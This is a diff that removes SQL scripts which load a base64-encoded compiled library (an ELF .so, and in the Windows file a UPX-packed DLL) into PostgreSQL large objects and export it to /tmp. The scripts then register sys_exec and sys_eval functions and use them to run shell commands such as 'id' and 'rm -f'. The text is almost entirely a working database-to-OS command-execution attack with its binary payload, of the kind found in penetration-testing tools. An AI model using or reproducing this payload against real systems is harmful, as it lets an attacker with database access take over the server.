-- SO compiled using PostgreSQL 8.2 C libraries
-- INSERT INTO udftest(data) VALUES ('f0VMRgEBAQAAAAAAAAAAAAMAAwABAAAAYAYAADQAAAB8EQAAAAAAADQAIAAFACgAGQAYAAEAAAAAAAAAAAAAAAAAAAD4CQAA+AkAAAUAAAAAEAAAAQAAAAQPAAAEHwAABB8AAAgBAAAQAQAABgAAAAAQAAACAAAAGA8AABgfAAAYHwAA0AAAANAAAAAGAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAUuV0ZAQPAAAEHwAABB8AAPwAAAD8AAAABAAAAAEAAAARAAAAGgAAAAAAAAANAAAAAAAAAAQAAAAAAAAAAgAAAAcAAAAAAAAAFQAAABcAAAAOAAAADwAAAAwAAAATAAAACAAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAwAAAAUAAAAAAAAAEgAAABgAAAAAAAAACQAAABQAAAALAAAAFgAAAAAAAAAAAAAAAAAAABkAAAAAAAAACgAAAAAAAAAQAAAAAAAAABEAAAADAAAAEAAAAAIAAAAGAAAAiACgAQTNRFkQAAAAFgAAABgAAAAuZ1QeqGi+EqpfvhK645J8QkXV7DNeVB7YcVgcuY3xDurT7w7HDabUAAAAAAAAAAAAAAAAAAAAAJAAAAAAAAAAAAAAABIAAADLAAAAAAAAAAAAAAAQAAAAAQAAAAAAAAAAAAAAIAAAACsAAAAAAAAAAAAAACAAAACWAAAAAAAAAAAAAAASAAAAxAAAAAAAAAAAAAAAEgAAAJ4AAAAAAAAAAAAAABIAAACmAAAAAAAAAAAAAAASAAAAzAAAAAAAAAAAAAAAEgAAAIkAAAAAAAAAAAAAABIAAACCAAAAAAAAAAAAAAASAAAAswAAAAAAAAAAAAAAEgAAABwAAAAAAAAAA');
-- UPDATE udftest SET data=data||'AAAACIAAACsAAAAAAAAAAAAAAASAAAAcQAAAAAAAAAAAAAAEAAAAE0AAAAmBwAACgAAABIACwBWAAAA/ggAAH4AAAASAAsAaAAAADoHAADEAQAAEgALAO4AAAAUIAAAAAAAABAA8f/bAAAADCAAAAAAAAAQAPH/XwAAADAHAAAKAAAAEgALAOIAAAAMIAAAAAAAABAA8f8QAAAA+AUAAAAAAAASAAkAFgAAALgJAAAAAAAAEgAMAD8AAAAcBwAACgAAABIACwAAX19nbW9uX3N0YXJ0X18AX2luaXQAX2ZpbmkAX19jeGFfZmluYWxpemUAX0p2X1JlZ2lzdGVyQ2xhc3NlcwBQZ19tYWdpY19mdW5jAHBnX2ZpbmZvX3N5c19leGVjAHBnX2ZpbmZvX3N5c19ldmFsAHBnX2RldG9hc3RfZGF0dW0AbWFsbG9jAG1lbWNweQBwb3BlbgByZWFsbG9jAHN0cm5jcHkAZmdldHMAcGNsb3NlAF9fc3RhY2tfY2hrX2ZhaWwAc3lzdGVtAHBmcmVlAGxpYmMuc28uNgBfZWRhdGEAX19ic3Nfc3RhcnQAX2VuZABHTElCQ18yLjEuMwBHTElCQ18yLjQAR0xJQkNfMi4wAEdMSUJDXzIuMQAAAAACAAAAAAAAAAMAAwADAAMAAwADAAMABAAFAAIAAAABAAEAAQABAAEAAQABAAEAAQABAAAAAQAEANEAAAAQAAAAAAAAAHMfaQkAAAUA8wAAABAAAAAUaWkNAAAEAP8AAAAQAAAAEGlpDQAAAwAJAQAAEAAAABFpaQ0AAAIAEwEAAAAAAAAgBwAACAAAACoHAAAIAAAANAcAAAgAAAClBwAACAAAAAggAAAIAAAAWwcAAAIPAAAXCQAAAg8AAHIHAAACCwAAlw';
-- UPDATE udftest SET data=data||'cAAAILAACPCAAAAgsAAC4JAAACCwAAhwcAAAIKAADYCAAAAgoAAEMJAAACCgAArQcAAAIBAADyBwAAAgUAABoIAAACBwAAQAgAAAIIAABWCAAAAg4AAO8IAAACDAAATwkAAAIGAABZCQAAAgkAAGkJAAACAgAA6B8AAAYDAADsHwAABgQAAPAfAAAGDQAAACAAAAcDAAAEIAAABw0AAFWJ5VOD7AToAAAAAFuBw/AZAACLk/T///+F0nQF6B4AAADowQAAAOhcAwAAWFvJw/+zBAAAAP+jCAAAAAAAAAD/owwAAABoAAAAAOng/////6MQAAAAaAgAAADp0P///wAAAAAAAAAAVYnlVlPorQAAAIHDihkAAIPsEIC7GAAAAAB1XYuD/P///4XAdA6LgxQAAACJBCTotP///4uLHAAAAI2DHP///42TGP///ynQwfgCjXD/OfFzII22AAAAAI1BAYmDHAAAAP+Ugxj///+LixwAAAA58XLmxoMYAAAAAYPEEFteXcNVieVT6C4AAACBwwsZAACD7ASLkyD///+F0nQVi5P4////hdJ0C42DIP///4kEJP/Sg8QEW13Dixwkw5BVieW44AkAAF3DVYnluNwJAABdw1WJ5bjYCQAAXcNVieVXVlOB7CwEAABloRQAAACJRfAxwItFCItAEIkEJOj8////iceLACX///8/jXD8g+gDiQQk6Pz///+Jw41HBIl0JAiJRCQEiRwk6Pz////GBDMAxwQkAQAAAOj8////iYXY+///x0QkBNQJAACJHCTo/P///4mF3Pv//8eF4Pv//wAAAADrYY298Pv//7gAAAAAuf/////yronI99CNcP+LneD7//8B84lcJASLldj7//+JFCTo/P///4mF2Pv//4l0JAiNhfD7//+';
-- UPDATE udftest SET data=data||'JRCQEi4XY+///A4Xg+///iQQk6Pz///+JneD7//+Lldz7//+JVCQIx0QkBAAEAACNhfD7//+JBCTo/P///4XAD4V3////i5Xc+///iRQk6Pz///+Lhdj7//+AOAB0C4uV4Pv//8ZEEP8Avv////+Lvdj7//+7AAAAAInxidjyrvfRg8EDiQwk6Pz///+JhdT7//+Lvdj7//+J8YnY8q730YPBA4uV1Pv//4kKi73Y+///ifHyrvfRg+kBidCDwASJTCQIi5XY+///iVQkBIkEJOj8////i4XU+///i1XwZTMVFAAAAHQF6Pz///+BxCwEAABbXl9dw1WJ5YPsGIld9Il1+Il9/ItVCItCEIkEJOj8////iceLACX///8/jXD8g+gDiQQk6Pz///+Jw41HBIl0JAiJRCQEiRwk6Pz////GBDMAiRwk6Pz///+JxokcJOj8////i0UIO3gQdAiJPCTo/P///4nwi130i3X4i338iexdw5CQkJBVieVWU+iN/f//gcNqFgAAi4MQ////g/j/dBmNsxD///+NtCYAAAAAg+4E/9CLBoP4/3X0W15dw1WJ5VOD7AToAAAAAFuBwzAWAADokPz//1lbycNyAAAAAQAAAAEAAAAUAAAAIgMAAGQAAAAgAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
-- UPDATE udftest SET data=data||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
-- UPDATE udftest SET data=data||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP////8AAAAA/////wAAAAAAAAAAAQAAANEAAAAMAAAA+AUAAA0AAAC4CQAABAAAANQAAAD1/v9viAEAAAUAAAB0AwAABgAAANQBAAAKAAAAHQEAAAsAAAAQAAAAAwAAAPQfAAACAAAAEAAAABQAAAARAAAAFwAAAOgFAAARAAAAGAUAABIAAADQAAAAEwAAAAgAAAAWAAAAAAAAAP7//2/IBAAA////bwEAAADw//9vkgQAAPr//28FAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgfAAAAAAAAAAAAAD4GAABOBgAACCAAAA';
-- UPDATE udftest SET data=data||'BHQ0M6IChVYnVudHUgNC4zLjItMXVidW50dTEyKSA0LjMuMgAAR0NDOiAoVWJ1bnR1IDQuMy4yLTF1YnVudHUxMikgNC4zLjIAAEdDQzogKFVidW50dSA0LjMuMi0xdWJ1bnR1MTIpIDQuMy4yAABHQ0M6IChVYnVudHUgNC4zLjItMXVidW50dTEyKSA0LjMuMgAAR0NDOiAoVWJ1bnR1IDQuMy4yLTF1YnVudHUxMikgNC4zLjIAAC5zaHN0cnRhYgAuZ251Lmhhc2gALmR5bnN5bQAuZHluc3RyAC5nbnUudmVyc2lvbgAuZ251LnZlcnNpb25fcgAucmVsLmR5bgAucmVsLnBsdAAuaW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5laF9mcmFtZQAuY3RvcnMALmR0b3JzAC5qY3IALmR5bmFtaWMALmdvdAAuZ290LnBsdAAuZGF0YQAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8AAAAFAAAAAgAAANQAAADUAAAAtAAAAAMAAAAAAAAABAAAAAQAAAALAAAA9v//bwIAAACIAQAAiAEAAEwAAAADAAAAAAAAAAQAAAAEAAAAFQAAAAsAAAACAAAA1AEAANQBAACgAQAABAAAAAEAAAAEAAAAEAAAAB0AAAADAAAAAgAAAHQDAAB0AwAAHQEAAAAAAAAAAAAAAQAAAAAAAAAlAAAA////bwIAAACSBAAAkgQAADQAAAADAAAAAAAAAAIAAAACAAAAMgAAAP7//28CAAAAyAQAAMgEAABQAAAABAAAAAEAAAAEAAAAAAAAAEEAAAAJAAAAAgAAABgFAAAYBQAA0AAAAAMAAAAAAAAABAAAAAg';
-- UPDATE udftest SET data=data||'AAABKAAAACQAAAAIAAADoBQAA6AUAABAAAAADAAAACgAAAAQAAAAIAAAAUwAAAAEAAAAGAAAA+AUAAPgFAAAwAAAAAAAAAAAAAAAEAAAAAAAAAE4AAAABAAAABgAAACgGAAAoBgAAMAAAAAAAAAAAAAAABAAAAAQAAABZAAAAAQAAAAYAAABgBgAAYAYAAFgDAAAAAAAAAAAAABAAAAAAAAAAXwAAAAEAAAAGAAAAuAkAALgJAAAcAAAAAAAAAAAAAAAEAAAAAAAAAGUAAAABAAAAAgAAANQJAADUCQAAIAAAAAAAAAAAAAAABAAAAAAAAABtAAAAAQAAAAIAAAD0CQAA9AkAAAQAAAAAAAAAAAAAAAQAAAAAAAAAdwAAAAEAAAADAAAABB8AAAQPAAAIAAAAAAAAAAAAAAAEAAAAAAAAAH4AAAABAAAAAwAAAAwfAAAMDwAACAAAAAAAAAAAAAAABAAAAAAAAACFAAAAAQAAAAMAAAAUHwAAFA8AAAQAAAAAAAAAAAAAAAQAAAAAAAAAigAAAAYAAAADAAAAGB8AABgPAADQAAAABAAAAAAAAAAEAAAACAAAAJMAAAABAAAAAwAAAOgfAADoDwAADAAAAAAAAAAAAAAABAAAAAQAAACYAAAAAQAAAAMAAAD0HwAA9A8AABQAAAAAAAAAAAAAAAQAAAAEAAAAoQAAAAEAAAADAAAACCAAAAgQAAAEAAAAAAAAAAAAAAAEAAAAAAAAAKcAAAAIAAAAAwAAAAwgAAAMEAAACAAAAAAAAAAAAAAABAAAAAAAAACsAAAAAQAAAAAAAAAAAAAADBAAALkAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAMAAAAAAAAAAAAAAMUQAAC1AAAAAAAAAAAAAAABAAAAAAAAAA==';
-
-
-- Create a new OID for a large object, it implicitly adds an entry in the
-- PostgreSQL large objects system table
-- 
-- References:
-- http://www.postgresql.org/docs/8.3/interactive/largeobjects.html
-- http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html
-SELECT lo_unlink(35817);
-SELECT lo_create(35817);
-
-
-- Update the PostgreSQL system large objects table assigning to the just
-- created OID the binary (base64 decoded) UDF as data
-- 
-- Refereces:
-- http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql
-UPDATE pg_largeobject SET data=(DECODE((SELECT data FROM udftest), 'base64')) WHERE loid=35817;
-
-
-- Export the binary UDF OID to a file on the file system
-- 
-- Any folder where postgres user has read/write/execute access is valid
-SELECT lo_export(35817, '/tmp/lib_postgresqludf_sys.so'); -- -rw-r--r-- 1 postgres postgres
-- 
-- Notes:
-- If the library file already exists and the postgres user has write
-- access over it, it can overwrite the file
-- The following enumerates the PostgreSQL data directory
-- SELECT CURRENT_SETTING('data_directory')
-- Reference:
-- http://www.postgresql.org/docs/8.3/interactive/functions-admin.html
-- The following will save into /var/lib/postgresql/M.m/main/lib_postgresqludf_sys.so
-- SELECT lo_export(35817, 'lib_postgresqludf_sys.so'); -- -rw-r--r-- 1 postgres postgres
-- The following would save into / (Permission denied)
-- SELECT lo_export(35817, '/lib_postgresqludf_sys.so');
-
-
-- Create two functions from the binary UDF file
-CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS '/tmp/lib_postgresqludf_sys.so', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/lib_postgresqludf_sys.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-
-
-- Test the two functions
-SELECT sys_exec('echo test > /tmp/lib_postgresqludf_sys.txt'); -- -rw------- 1 postgres postgres
-SELECT sys_eval('cat /tmp/lib_postgresqludf_sys.txt ; id');
-
-
-- Cleanup the file system and the database
-SELECT sys_exec('rm -f /tmp/lib_postgresqludf_sys.*');
-DROP TABLE IF EXISTS udftest;
-DROP FUNCTION IF EXISTS sys_exec(text);
-DROP FUNCTION IF EXISTS sys_eval(text);
--- a/extra/postgresqludfsys/command_execution/windows.sql
+++ b/extra/postgresqludfsys/command_execution/windows.sql
@@ -1,104 +0,0 @@
-- Notes:
-- 
-- The DLL compiled using PostgreSQL 8.3 C libraries differs from the one
-- compiled using PostgreSQL 8.2 C libraries
-- 
-- DLL compiled using PostgreSQL 8.3 C libraries
-- lib_postgresqludf_sys.dll: 8192 bytes (MS-DOS executable PE  for MS Windows (DLL) (GUI) Intel 80386 32-bit)
-- lib_postgresqludf_sys.dll: 6144 bytes (MS-DOS executable PE  for MS Windows (DLL) (GUI) Intel 80386 32-bit, UPX compressed)
-- 
-- DLL compiled using PostgreSQL 8.2 C libraries
-- lib_postgresqludf_sys.dll: 8192 bytes (MS-DOS executable PE  for MS Windows (DLL) (GUI) Intel 80386 32-bit)
-- lib_postgresqludf_sys.dll: 6144 bytes (MS-DOS executable PE  for MS Windows (DLL) (GUI) Intel 80386 32-bit, UPX compressed)
-- 
-- Little hack to compress the dynamic-linked library:
-- * Read instructions on http://rpbouman.blogspot.com/2007/09/creating-mysql-udfs-with-microsoft.html
--   * Remember to compile it under Visual C++ 2008 with the
--     'Configuration' set as 'Release'
-- * Use upx (http://upx.sourceforge.net) over the DLL:
--   * upx -9 library.dll -o library_upx.dll
-
-
-- Create a table with one field data-type text
-DROP TABLE IF EXISTS udftest;
-CREATE TABLE udftest(data text);
-
-
-- Insert the base64 encoded UDF in the table
-
-- DLL compiled using PostgreSQL 8.3 C libraries
-INSERT INTO udftest(data) VALUES ('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAD12MHTsbmvgLG5r4Cxua+AuME8gLO5r4C4wTqAsLmvgLjBLIC/ua+AuMErgLO5r4CWf9SAtLmvgLG5roCYua+AuMEmgLC5r4C4wT2AsLmvgLjBPoCwua+AUmljaLG5r4AAAAAAAAAAAFBFAABMAQMA+iGDSQAAAAAAAAAA4AACIQsBCQAAEAAAABAAAABgAAAgewAAAHAAAACAAAAAAAAQABAAAAACAAAFAAAAAAAAAAUAAAAAAAAAAJAAAAAQAAAAAAAAAgBAAQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAKyDAAC4AAAAtIIAAPgAAAAAgAAAtAIAAAAAAAAAAAAAAAAAAAAAAABkhAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA7HwAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVVBYMAAAAAAAYAAAABAAAAAAAAAABAAAAAAAAAAAAAAAAAAAgAAA4FVQWDEAAAAAABAAAABwAAAADgAAAAQAAAAAAAAAAAAAAAAAAEAAAOAucnNyYwAAAAAQAAAAgAAAAAYAAAASAAAAAAAAAAAAAAAAAABAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
-UPDATE udftest SET data=data||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMy4wMwBVUFghDQkCCcR4kqVtpBAFE1UAABYLAAAAIAAAJgAAnUB2Sf64AAAQ+MPMDxEM/9/+f1NVi2wkDItFEFZXUOgbAeaL2Iszwe4Cg+4Ef/ff/Y1OAVH/FT+MVo1TBIv4UlcgCpBXxgQ3APd/7GMXhFeL8AiUg8QcO10QdAlTQkDO/tvsDQRfi8ZeXVvDbxC6/7Z9gewIBBKhAiAAM8SJhCQEDYtvsvbZBgxAEI2GLXi8fcBudIs3jNVWg8eI2FdTbXfZjmoBiTPVaGIUU4q79tvYM/+MiCBTjVQkOBZTUon/9m3sXCQ8FnyVLIXAdMpEJBSNUAGKG2tv/whAhMl1+SvCLY0sO3YjeETdH/tuUx8gUAP+VxCAi0wkJFFNLO3lsCeL/UsgdbSLXP67sbMQqFMXkPmAPgB0BcZEN/+69gPbz8Zng8AEUKvQxj6Ze+ckGI2kJAAAH40EhRDH/oXtD4kHNlCNTwRWUe+LjLD5gmuZhF0Mi8dfM8zWXTj8KfKBxFFi/yWBqAX92z88pDsNYHUC88PpCAWvi/9WaIAXYmXMXORw7a5ZWd3/f5ejI1gEVIX2dQUzwEBew4MmAFYHtit83X1oBKcJZnKpBrkLe6O1NlkjIk407FFRCv8Ku385RQx1DjkFaxB+ZXMQg30Mu4XG3QGLCRBIiw3MiQojSC3stu4PhdR9ZBcYBot5wjW7dnfbICiJPVC7HlDrGEqnBHJw';
-UPDATE udftest SET data=data||'4cH+O8d0F2joA6gsagDp/9bwrtveaOfrB8csATyhL0xqAl797d7dyQlqH5IJJus8qhDABLjHBbOufe8fKBog4CcHXOP9+75vILQEsBsaWYk1KzR3f+52WTmydQhpczA5PRVcdBxW+tu9aAYoCFxDDf91IAPDF9veCCMW//FUbAHsjzU33AgBodt4BINl/ADfJBPZ2dsP1PxvbLD2g/gCZtJZW/+gvBm2sVhLUDFZLjUPhIfXHO07xxlUE00UGNjGt38QiX0Ig+8EO8hyUYM/f/NqmG3tt5wHdOn/NyYg+BBmbbbQXLn4VhVE1rjj9htHTfhVOU0QA9C7bVv7CHS0iQkCDBoIYOun9ogxO2kM5FlELoXtK8Q4WAZMMvw//g1HkFBDm1vJwgwAahBzf3sbQxIo0MT5i/KLXQgcVOFld3vkM8lc/Il9IAj8O/FaP7YWYzk6RBfkr2g728Kb//B0BYP+AnUuoew7wXSeVl/QzizccDte5AADkxFO9uB2WgJQFBaAEgkyzloN/yf+AXUkZCBOE1fXEJsVdy9S0gYRDftrtFP3agN1Q09hhz3bNAMhaHQuLCV/8bZw4esbceyLFwmq4FBRtMKl8mQsEGXo9i/brm04+tL+/wAZBYEq5KSuPX4hncOW7Bb/O3B8hdMkahvWVDO8u1V9RFUMDQR2WV04ItpQLhAnKANfISBzc/NmQwUciRUYiR0UiTU023dzEIk9DGaMGDgGDSyzNEuzHQgFBCWsfXdLAC1//JyPFDCVVvbPn20kBwQojUUINIuF4Pygrp2NsapwlQEcGWNs69ggJBMYCWXACRyzls/dNWCJhdgyCgTcKvCNYQMUNGidBqcz/rRsWWr3GHkt77D2fRyDPSAA+SNoW9NjBWIbegYkycOAkY8L30Aecl9qFEpQ9FhISRWq+KLG4fefnBBkWetnagg3hFmP7dYdkhsnNVk04PXzHW6FvwPkUH9LdIytbT9gCn4c3BQs1uK0VypbCeAb0jpnk+Ul2wdd3Gx4/u/c';
-UPDATE udftest SET data=data||'hFnZThYGwffYG8D32FlIXX/p221WuLwYvgRXUDvGcw+LB/QOGh1TAlDNO/5y8SnkOawwJSAg7RsxEz9lMQi4TVoql39X+mY5AXQEVGRBPAPBgThQRXXviRv8+zPSuQsBHEgYD5Tfwl1+35qGLT/ZSDHID7dBDbbbEjhWBXEGM1f4b43G0ggYDXbgnBwMO/nab/D/cgmLWAgD2Tv7cgpCvCg71nLoag+H7JnbTk9q/p9w8wUcm2i1ZA7+UIPsCN1wawwlMWIzxWzwZKMLn6H0GoksSAloS/CuMzEGbMwS61WXNMvDvi0TUBkIDAg7QbjwWxskwegf9wvgAYW77dQKA08ZAFmUi+Xr2E5qlpkByj2lwPqyFuwUmS+7MSNjJ7EzPAVARPlxSSNMpRKsEOw7uQ5jCWEQxab7CwOPWe9W+TbLNttSkGwDjSvg+lgDzZn88Tyq/Ipgk2Agcw3DlQ4O42yWUUoUdT50uxnaaQH2BCAUCopW7PdYGFij7BBofjQH/8j4U1e/TuZAu3pmU6HEHXgNhcMnNZBiUmvxBOtg+3hfC8VaW4F1mJILh/DmyiBjBzQInSf9re1oGPQzDBE793UHvk8IfBffWesLhfN1o8HgEAvwxCOUPvYA99YHBF5fW7Y/mCMjI2MFnFhcYAKyIyNoVAAAlAp5AAIFALPsPmqpwRQRIwNkaAZpugNAAXJI/36JMn1REhBLUlNEU/9///9ie5Q0/rQnQb7gu040vsrDF0M6XERvY3VtZW50/9v//3MgYW5kIFNldHRpbmdzXEFkbQdpc3RyYXRvci63t/b/VzJLM1NURU5VUERBBjNlc2sWcFzt/9/+c2hhcmVcdiZ1YWxfY3BwX3Byb2plY3Q+2/+2/GxpYl9wb2cfc3FsdWRmX3N5FVLDfoH9ZWxlYXNlHS5wZGLRfC8WyLUZlwfQYF0lmw/HhQdOyWHdUQNlJ8wHYXQn7MAP2B8I6wP/IAABSfBBqSDKIiIBZt8NsRm/RP8Ag1EGjKpgApIYBVBU';
-UPDATE udftest SET data=data||'gC0oFP8vzxR4EAFHZXRDdXJyZW50//+R/1Byb2Nlc3NJZFN5c3RlbVRpbWVBc0ZpbGWt/RZ7CRgIY2tDb3UvDYu1v/1RdWVyeVADZm9ybWFuPBYO/Vv3WxhEaXNhYjNoV2FkTGlicmFW/m+/J0NhbGxzb0lzRGVidWdnZXJt2/ayuXZUU1VuaEBkMWRhMffbRXhGcHRpb25zShmgbSlbuRJUF99kbQlEYR4RSZBsc9utbQxrQJ1tcIdlR1GEteaaf3dVUSLCbNmyG1zEFXd7moUzhTxfY2l0NG3fDVhtCl80X2Ftc2cIeO9+4a8RC2RqdUJfZmRpdg1fQ3BwQPvD2lhjv7xfZGVjbwNtYcISlGkyXW0e1t4ruHkYQosy9QlMFizYbk0TD2Xt9gkjDV8bcjRfTG1tHGbX/n0YbldkX251PURtYdzCxrZjHnI0bnPY3Qzb9h0IZvJ0LK5ybrnbO4yEc/zdKnBlVeYK7ZtFD2MHtDA6twnOve9WyM6Lb29D+9ZitiJWbl90eTkctlBoDRqJFYpfcnuahS0KbEaRpHBFuODePXBnQ3RvYXNLunVt///PAlYQMBgJHxYjKgsXJBEXEQeCBgb2////FwkHBRYMHggKCxYJGBgVBQYbBQwQBgcXBiEFEQ++/2//BhQhEQsIKyIFBw0RHQ0YUy1IOAYAB9u+XU4IDAkzCgkLDFsFFr/922UWDgs0FQsYFg09BUK4BRIeFGub/90GaTIRDA4dTQUXIw0MJAgkAFPB/x/wJgY0BGAE6AgEHBwEAFL5D6t/TAEFAPohg0k04AACIQsBCcDsN2kMWwCQFQsz971HGgkLAt4e36X5ZgcDYATbzx5Ae7bsvQEqAgcGcCYHs33LZriMIlAUQE+wNdubMgBQn3fQHGWxA1nVGCFCAJsfSLovsC50ZXh0mgoestlgkAy3QmAucgmD3BrLYfsoBwgTfa85bAJALib+A23KTtOUMAInwE/7XrDGc3KA67BzGk9ujkYAUqlPjAFvSgZpUB5C';
-UPDATE udftest SET data=data||'GwDgk9uMIxKhUlMAAAAAAAAAAACQ/wAAAAAAAAAAAACAfCQIAQ+FuQEAAGC+AHAAEI2+AKD//1eDzf/rDZCQkIoGRogHRwHbdQeLHoPu/BHbcu24AQAAAAHbdQeLHoPu/BHbEcAB23PvdQmLHoPu/BHbc+QxyYPoA3INweAIigZGg/D/dHSJxQHbdQeLHoPu/BHbEckB23UHix6D7vwR2xHJdSBBAdt1B4seg+78EdsRyQHbc+91CYseg+78Edtz5IPBAoH9APP//4PRAY0UL4P9/HYPigJCiAdHSXX36WP///+QiwKDwgSJB4PHBIPpBHfxAc/pTP///16J97ktAAAAigdHLOg8AXf3gD8AdfKLB4pfBGbB6AjBwBCGxCn4gOvoAfCJB4PHBYjY4tmNvgBQAACLBwnAdDyLXwSNhDC0cgAAAfNQg8cI/5YEcwAAlYoHRwjAdNyJ+VdI8q5V/5YIcwAACcB0B4kDg8ME6+FhMcDCDACDxwSNXvwxwIoHRwnAdCI873cRAcOLA4bEwcAQhsQB8IkD6+IkD8HgEGaLB4PHAuvii64McwAAjb4A8P//uwAQAABQVGoEU1f/1Y2HBwIAAIAgf4BgKH9YUFRQU1f/1VhhjUQkgGoAOcR1+oPsgOmnmP//AAAASAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAEBAiABABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
